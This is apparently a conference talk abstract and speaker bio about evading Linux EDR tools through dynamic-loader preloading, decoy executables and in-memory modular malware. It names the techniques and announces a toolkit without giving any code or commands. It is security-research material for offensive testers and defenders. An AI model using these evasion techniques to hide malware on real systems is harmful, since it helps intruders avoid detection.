Zombie Ant Farm: Practical Tips for Playing Hide and Seek with Linux EDRs

Saturday at 12:00 in Track 4
45 minutes | Demo, Tool

Dimitry Snezhkov Sr. Security Consultant, X-Force Red

EDR solutions have landed in Linux. With the ever increasing footprint of Linux machines deployed in data centers, offensive operators have to answer the call.

In the first part of the talk we will share practical tips and techniques hackers can use to slide under the EDR radar, and expand post-exploitation capabilities.

We will see how approved executables could be used as decoys to execute foreign functionality. We will walk through the process of using well known capabilities of the dynamic loader. We will take lessons from user-land root-kits in evasion choices.

Part two will focus on weaponizing the capabilities. We will show how to create custom preloaders, and use mimicry to hide modular malware in memory. We will create a "Preloader-as-a-Service" capability of sorts by abstracting storage of modular malware from its executing cradles. This PaaS is free to you though!

We fully believe the ability to retool in the field matters, so we have packaged the techniques into reusable code patterns in a toolkit you will be able to use (or base your own code on) after it is released.

This talk is for hackers, offensive operators, malware analysts and system defenders. We sincerely hope defensive hackers can attend and also have fun.

Dimitry Snezhkov
Dimitry Snezhkov is a Sr. Security Consultant for X-Force Red. In this role he hacks code, tools, networks, apps and sometimes subverts human behavior too. Dimitry has spoken at DEF CON, THOTCON, DerbyCon, CircleCityCon, NorthSec, and presented tools at BlackHat Arsenal.

Twitter: @Op_Nomad


Return to Index    -    Add to    -    ics Calendar file